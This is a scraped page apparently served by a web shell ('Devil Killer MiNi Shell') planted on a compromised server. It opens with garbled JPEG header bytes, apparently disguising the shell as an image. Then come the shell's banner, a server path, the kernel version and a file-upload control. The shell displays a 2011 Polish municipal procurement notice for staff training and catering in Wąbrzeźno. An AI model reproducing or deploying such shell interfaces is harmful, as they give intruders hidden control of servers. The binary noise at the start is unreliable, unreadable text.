JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111228/439024-N-2011.html

<p class="kh_header"><b>Wąbrzeźno: Szkolenia dla pracowników czterech Urzędów Gmin:
 Urząd Miejski Wąbrzeźno, Urząd Miasta i Gminy Jabłonowo Pomorskie, 
Urząd Gminy Płużnica i Urząd Gminy Książki</b><br>
<b>Numer ogłoszenia: 439024 - 2011; data zamieszczenia: 28.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Wąbrzeźno , ul. Wolności 18, 87-200 Wąbrzeźno, woj. kujawsko-pomorskie, tel. 56 6884500, faks 56 688 27 48.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wabrzezno.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia dla pracowników czterech Urzędów Gmin:
 Urząd Miejski Wąbrzeźno, Urząd Miasta i Gminy Jabłonowo Pomorskie, 
Urząd Gminy Płużnica i Urząd Gminy Książki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie 3 zadań szkoleniowych dla pracowników czterech Urzędów Gmin: Urząd Miejski Wąbrzeźno, Urząd Miasta i Gminy Jabłonowo Pomorskie, Urząd Gminy Płużnica i Urząd Gminy Książki. Poszczególne zadania szkoleniowe odpowiadają Zadaniom 8, 9 i 10 zdefiniowanym we wniosku o dofinansowanie projektu Przygotowanie administracji samorządowej do skuteczniejszego działania (dalej Projekt). Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej.
I. Informacje ogólne: 
1.1 Miejsce prowadzenia szkoleń: sale szkoleniowe Urzędu Miejskiego Wąbrzeźno, ul. Wolności 18, 87-200 Wąbrzeźno i ewentualnie inne sale szkoleniowe wskazane przez Zamawiającego na terenie miasta Wąbrzeźno. 
1.2. Zajęcia będą odbywać się w czasie pracy Urzędu, w wymiarze 7 godzin lekcyjnych (po 45 min) dziennie, w dniach od poniedziałku do czwartku, w godzinach od 8.00 do 15.00 dla wyodrębnionych grup szkoleniowych według szczegółowych zakresów tematycznych zgodnie z Harmonogramem realizacji usługi szkoleniowej (Załącznik nr 7 do SIWZ). 
1.3. Zamawiający zapewnia salę szkoleniową wyposażoną w stoliki, krzesła, projektor multimedialny, ekran, flipchart (bez pisaków i bloków papierowych) oraz odpowiednie nagłośnienie.
1.4. Zamawiający zapewnia materiały promocyjne dla uczestników szkoleń w postaci teczki z ologowaniem, notatnika, długopisu. 
1.5. Zamawiający zapewnia oznakowanie sali szkoleniowej zgodnie w z aktualnymi Wytycznymi dotyczącymi oznaczania projektów w ramach  PO KL dostępnymi na stronie internetowej Ministerstwa Spraw Wewnętrznych i Administracji 
II. Ogólna charakterystyka usług szkoleniowych:
Zamówienie dotyczy 3 zadań szkoleniowych zaplanowanych w projekcie: Przygotowanie administracji samorządowej do skuteczniejszego działania: 

2.1Zadanie 8 - Przeprowadzenie specjalistycznych szkoleń dla 52 urzędników z 4 JST przygotowujących decyzje administracyjne

            Grupa C1, C2, C3 i C4
oraz
      Grupa D1, D2, D3, D4, D5 i D6:
a)	Uczestnicy: urzędnicy przygotowujący decyzje administracyjne - 52 osoby (najpierw 	w 4 grupach po 13 osób, a następnie w 6 grupach, wg specyfiki wydawanych decyzji kolejno po 10, 11, 8, 7, 9 i 7 osób)
b) Liczba godzin: 4 dni szkoleń x 7 godzin = 28 h dla każdej grupy (4 grupy)
    oraz 4 dni szkoleń x 7 godzin = 28 h dla każdej grupy (6 grup)
c) Łączna liczba godzin: 4 grupy x 28h = 112h
                                oraz 6 grup x 28h = 168h
d) Termin realizacji szkoleń: zgodnie z harmonogramem realizacji usługi szkoleniowej (Załącznik nr 7).
e) Forma zajęć: wykłady, warsztaty, ćwiczenia, dyskusje i case study
f) Zakres tematów szkoleń: 
- Procedury wydawania decyzji administracyjnych (szkolenie ogólne) - 4 dni szkoleniowe dla każdej z 4 grup C1, C2, C3 i C4
 -Sprawy podatkowe (szkolenie specjalistyczne) - 4 dni szkoleniowe dla grupy D1
 -Sprawy obywatelskie (szkolenie specjalistyczne) - 4 dni szkoleniowe dla grupy D2
 -Sprawy zagospodarowania przestrzennego (szkolenie specjalistyczne) - 4 dni szkoleniowe dla grupy D3
- Sprawy ochrony środowiska (szkolenie specjalistyczne) - 4 dni szkoleniowe dla grupy D4
- Sprawy gospodarki nieruchomościami (szkolenie specjalistyczne) - 4 dni szkoleniowe dla grupy D5
- Sprawy budownictwa (szkolenie specjalistyczne) - 4 dni szkoleniowe dla grupy D6
Wykonawca zobowiązany jest uwzględnić powyższe zakresy tematów szkoleń opracowując programy szczegółowe szkoleń. 

2.2. Zadanie 9 - Przeprowadzenie ogólnych i specjalistycznych szkoleń dla 12 urzędników z 4 JST na kierowniczych stanowiskach urzędniczych 
          Grupa K1:
a) Uczestnicy: urzędnicy na kierowniczych stanowiskach urzędniczych - 12 osób (w 1 grupie)
b) Liczba godzin: 10 dni szkoleń x 7 godzin = 70 h dla grupy
c) Łączna liczba godzin: 1 grupa x 70 h = 70 h
d) Termin realizacji szkoleń: zgodnie z harmonogramem realizacji usługi szkoleniowej (Załącznik nr 7).
e) Forma zajęć: wykłady, warsztaty, ćwiczenia, dyskusje i case study
f) Zakres tematów szkoleń: 
- Techniki komunikacji i wystąpienia publiczne (szkolenie ogólne) - 1 dzień szkoleniowy dla grupy
- Zarządzanie czasem i organizacja pracy własnej (szkolenie ogólne) - 1 dzień szkoleniowy dla grupy
- Walka ze stresem i umiejętność działania pod presją (szkolenie ogólne) - 1 dzień szkoleniowy dla grupy
- PR, współpraca pomiędzy JST (szkolenie ogólne) - 1 dzień szkoleniowy dla grupy
- Zarządzanie kadrami (szkolenie specjalistyczne) - 1 dzień szkoleniowy dla grupy
- System ocen pracowniczych (szkolenie specjalistyczne) - 1 dzień szkoleniowy dla grupy
- Zamówienia publiczne (szkolenie specjalistyczne) - 1 dzień szkoleniowy dla grupy
- Przegotowywanie projektów uchwał (szkolenie specjalistyczne) - 1 dzień szkoleniowy dla grupy
- Ochrona danych osobowych (szkolenie specjalistyczne) - 1 dzień szkoleniowy dla grupy
- Dostęp do informacji publicznej (szkolenie specjalistyczne) - 1 dzień szkoleniowy dla grupy
Wykonawca zobowiązany jest uwzględnić powyższe zakresy tematów szkoleń opracowując programy szczegółowe szkoleń. 

2.3. Zadanie 10 - Przeprowadzenie specjalistycznych szkoleń dla 42 urzędników według potrzeb stanowiska pracy 
          
Grupa S1, S2, S3, S4

a) Uczestnicy: pracownicy urzędów gmin odpowiedzialni za finanse publiczne, zamówienia publiczne, obsługę organów JST oraz obsługę środków unijnych w samorządach - 4 grupy kolejno po 14, 12, 6 i 10 osób
b) Liczba godzin: 4 dni szkoleń x 7 godzin = 28 h
c) Łączna liczba godzin: 4 grupy x 28 h = 112 h
d) Termin realizacji szkoleń: zgodnie z harmonogramem realizacji usługi szkoleniowej (Załącznik nr 7).
e) Forma zajęć: wykłady, warsztaty, ćwiczenia, dyskusje i case study
f) Zakres tematów szkoleń:
- Tematy związane z finansami publicznymi - 1 dzień szkoleniowy dla grupy
- Tematy związane z zamówieniami publicznymi - 1 dzień szkoleniowy dla grupy
- Tematy związane z obsługą Rady Gminy - 1 dzień szkoleniowy dla grupy
- Tematy związane z ubieganiem się, wykorzystaniem i obsługą środków unijnych w zakresie działalności samorządu - 1 dzień szkoleniowy dla grupy
Wykonawca zobowiązany jest uwzględnić powyższe zakresy tematów szkoleń opracowując programy szczegółowe szkoleń. 

III. Szczegółowa charakterystyka wymagań wobec usług szkoleniowych:
3.1 W ramach opracowania i przeprowadzenia szkoleń stacjonarnych dla pracowników czterech urzędów gmin: Urząd Miejski Wąbrzeźno, Urząd Miasta i Gminy Jabłonowo Pomorskie, Urząd Gminy Płużnica i Urząd Gminy Książki w ramach projektu Przygotowanie administracji samorządowej do skuteczniejszego działania (dalej - Projekt) Wykonawca będzie zobowiązany zapewnić:
3.1.1 Przeprowadzenie szkoleń będących przedmiotem zamówienia zgodnie ze złożoną przez Wykonawcę ofertą oraz zgodnie z Harmonogramem realizacji usługi szkoleniowej (Załącznik nr 7 do SIWZ).

3.1.2 Wysoko wykwalifikowaną kadrę wykładowców do prowadzenia szkoleń ogólnych i specjalistycznych, która posiada wykształcenie i doświadczenie zawodowe zgodnie z wymaganiami określonymi w SIWZ.

3.1.3  Opracowanie i dostarczenie Zamawiającemu szczegółowego programu szkoleń na każdy dzień szkoleniowy. Programy szkoleń Wykonawca jest zobowiązany dostarczyć do akceptacji w wersji elektronicznej Zamawiającemu nie później niż 5 dni roboczych przed rozpoczęciem cyklu szkoleń dla każdej grupy.

3.1.4  Przygotowanie, wydruk i przekazanie wszystkim uczestnikom szkoleń - zbindowanych lub w inny sposób trwale złączonych materiałów szkoleniowych na każdy temat szkolenia. 
Materiały, o których mowa powyżej powinny składać się z 3 części:
- materiały podstawowe - kompendium wiedzy z danego tematu szkoleniowego
- materiały ćwiczeniowe - indywidualne i grupowe zadania, studia przypadków
- materiały uzupełniające - ustawy, akty wykonawcze, interpretacje, orzecznictwo, zalecenia, wytyczne, itp. (nie dotyczy szkoleń ogólnych)
Materiały ogółem powinny stanowić nie mniej niż 10 stron w formacie A4 na każdy dzień szkolenia. Powinny zostać przekazane za potwierdzeniem odbioru każdemu uczestnikowi szkolenia oraz dodatkowo muszą zostać dostarczone w wersji elektronicznej i papierowej Zamawiającemu do dokumentacji projektu. 
Materiały szkoleniowe Wykonawca jest zobowiązany dostarczyć do akceptacji w wersji elektronicznej Zamawiającemu nie później niż 5 dni przed każdym tematem szkoleniowym.

3.1.5 Opracowanie i wydruk zaświadczeń potwierdzających udział w cyklu szkoleń w ilości odpowiadającej liczbie uczestników oraz przekazanie ich uczestnikom za potwierdzeniem odbioru każdemu uczestnikowi po zakończeniu udziału w cyklu szkoleń. Wzór zaświadczenia Wykonawca jest zobowiązany dostarczyć do akceptacji w wersji elektronicznej Zamawiającemu nie później niż 5 dni roboczych przed zakończeniem cyklu szkoleń dla każdej grupy. 

3.1.6 Zweryfikowanie poziomu wiedzy, tj. stopnia osiągnięcia wskaźnika rezultatu miękkiego w ramach prowadzonych szkoleń. Wskaźnik rezultatu miękkiego został zdefiniowany w projekcie, jako: Podniesienie wiedzy i umiejętności w zakresie treści modułów (tematów) szkoleniowych wśród 90% pracowników.  
Stopień osiągnięcia wskaźnika rezultatu miękkiego powinien zostać zweryfikowany za pomocą przeprowadzenia przez Wykonawcę: 
a) dwóch testów weryfikujących wiedzę uczestników w każdym temacie szkoleń specjalistycznych, w tym jeden test na początku, a drugi na zakończenie danego tematu szkolenia. Powyższy test Wykonawca jest zobowiązany opracować i wydrukować w ilości odpowiadającej liczbie uczestników szkolenia. Test powinien składać się z ok. 10-15 pytań jednokrotnego wyboru. Wykonawca zobowiązany jest do sprawdzenia testów i zagregowania wyników w formie raportu (sprawozdania pisemnego) dla każdego tematu szkoleń. 
Wzory testów Wykonawca zobowiązany jest dostarczyć w wersji elektronicznej Zamawiającemu do akceptacji nie później niż 3 dni przed rozpoczęciem każdego tematu szkoleń specjalistycznych.
b) ankiet ewaluacyjnych badających wzrost wiedzy oraz poziom satysfakcji uczestników szkolenia w każdym module (temacie) szkoleń. 
Zamawiający dostarczy Wykonawcy wersję elektroniczną ankiet nie później niż 3 dni przed rozpoczęciem każdego szkolenia, natomiast Wykonawca będzie zobowiązany wydrukować i rozdać ankiety w ilości odpowiadającej liczbie uczestników szkolenia. 

3.1.7  Wszystkie dostarczone dokumenty, formularze, materiały, etc. związane z realizacją niniejszego zamówienia muszą być oznakowane przez Wykonawcę zgodnie z aktualnymi Wytycznymi dotyczącymi oznaczania projektów w ramach  PO KL dostępnymi na stronie internetowej 
3.1.8 Powadzenie dokumentacji realizowanych szkoleń według wzorów przesłanych przez Zamawiającego drogą elektroniczną po podpisaniu umowy. Dokumentacja, o której mowa dotyczy w szczególności: 
1) list obecności
2) dzienników zajęć
3) programów zajęć
4) ankiet ewaluacyjnych 
5) list potwierdzających odbiór: 
-materiałów szkoleniowych,
-wydanych książek (z podaniem tytułów), 
-wydanych certyfikatów ukończenia szkoleń.
3.1.10 Zorganizowanie cateringu dla uczestników szkoleń i wykładowców w postaci serwisu kawowego dla potrzeb organizacji dwóch przerw kawowych i jednej przerwy obiadowej według poniższych wymagań:

a) serwis kawowy: 
-sposób podania - w miejscu prowadzenia szkoleń, w formie stołu szwedzkiego z zapewnieniem warnika do grzania wody, filiżanek, talerzyków, szklanek, łyżeczek (niedopuszczalne jest stosowanie naczyń i sztućców jednorazowego użytku) i serwetek w liczbie adekwatnej do liczby uczestników szkoleń i wykładowców w danym dniu szkolenia, w tym także:
- ciastka (mieszanka deserowa -delicje, wafelki, ciastka kruche, itp.): 5 szt. różnych ciastek na osobę;
- kawa rozpuszczalna - 1 filiżanka 250 ml na osobę
- kawa mielona - 1 filiżanka 250 ml na osobę
- herbata - 1 filiżanka 250 ml na osobę
- 1 butelka 0,5 l wody mineralnej niegazowanej na osobę
- 1 butelka 0,5 l wody mineralnej gazowanej na osobę
- cukier - 4 łyżeczki lub 4 saszetki po 2 g na osobę
- śmietanka do kawy -50 ml na osobę
- cytryna do herbaty - 1 plasterek na osobę

b) przerwa obiadowa:
- sposób podania - obiad będzie serwowany każdego dnia szkolenia dla jego uczestników w sali szkoleniowej lub w innej sali znajdującej się w siedzibie Zamawiającego. Zamawiający nie dopuszcza stosowania naczyń i sztućców jednorazowego użytku

Menu obiadowe powinno być odrębnie przygotowane na każdy dzień szkoleń danej grupy i powinno składać się przynajmniej z: 1 zupy, 1 ciepłego dania głównego (w postaci dania mięsnego lub rybnego, ziemniaków lub zamienników w postaci kaszy, ryżu lub frytek) oraz surówki lub gotowanych warzyw, a także soku i wody do picia wg następującej gramatury:
- zupa - 250 ml na osobę
- porcja mięsa lub ryby - 150 gna osobę
- porcja ziemniaków)kaszy)ryżu)frytek - 150 g. na osobę
- surówki/ gotowane warzywa - 150 g każdego rodzaju na osobę
- sok (min. 2 smaki do wyboru) - 250 ml na osobę
- woda mineralna niegazowana/gazowana do wyboru - 250 ml na osobę.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki określone w art. 22 ust. 1 Pzp i nie podlegać wykluczeniu na podstawie art. 24 Pzp.  
Zamawiający dokona oceny spełniania w/w warunków, stosując formułę spełnia/nie spełnia na podstawie dokumentów załączonych przez wykonawców do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej trzy usługi szkoleniowe dla JST (szkolenie kierowane dla zatrudnionych urzędników) o wartości nie mniejszej niż 100.000,00 złotych brutto każda. 
Zamawiający dokona oceny spełniania w/w warunku, stosując formułę spełnia/nie spełnia na podstawie dokumentów załączonych przez wykonawców do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z treścią art. 144 Zamawiający przewiduje możliwość dokonania zmian postanowień Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w zakresie: 
1)zmiany liczebności grup docelowych wskazanych w definicji poszczególnych Zadań pod warunkiem zachowania łącznej liczby przeszkolonych osób, tj. 106;
2)zmiany terminów dotyczących realizacji poszczególnych zadań, jeżeli ich zachowanie jest niemożliwe ze względu na okoliczności, których Strony Umowy przy zachowaniu należytej staranności nie były w stanie uniknąć lub przewidzieć. Zmiany nie mogą jednakże powodować zmiany ostatecznego terminu wykonania zamówienia, określonego na dzień 31 sierpnia 2012 r.
3)zmiany ostatecznego terminu wykonania zamówienia tylko w następujących przypadkach:
a)wystąpienia siły wyższej, przez co rozumie się wydarzenia nieprzewidziane i poza kontrolą Stron niniejszej Umowy, występujące po podpisaniu Umowy, a powodujące niemożliwość wywiązania się z Umowy w jej obecnym brzmieniu,
b)występujących w trakcie realizacji zamówienia zmian przepisów prawa Unii Europejskiej lub prawa krajowego, co wpłynie na realizację zamówienia i spowoduje konieczność dostosowania opracowania do zmian przepisów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.wabrzezno.com/portal.php?aid=11999501444785c940db911<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać w Biurze Projektu - Wąbrzeski Dom Kultury, ul. Wolności 47, 87-200 Wąbrzeźno, lub otrzymać drogą elektroniczną lub faksem składając zapotrzebowanie do zamawiającego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2012 godzina 10:00, miejsce: Oferty należy składać w Urząd Miejski w Wąbrzeźnie, ul. Wolności 18 , 87-200 Wąbrzeźno, sekretariat pok. nr 20..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




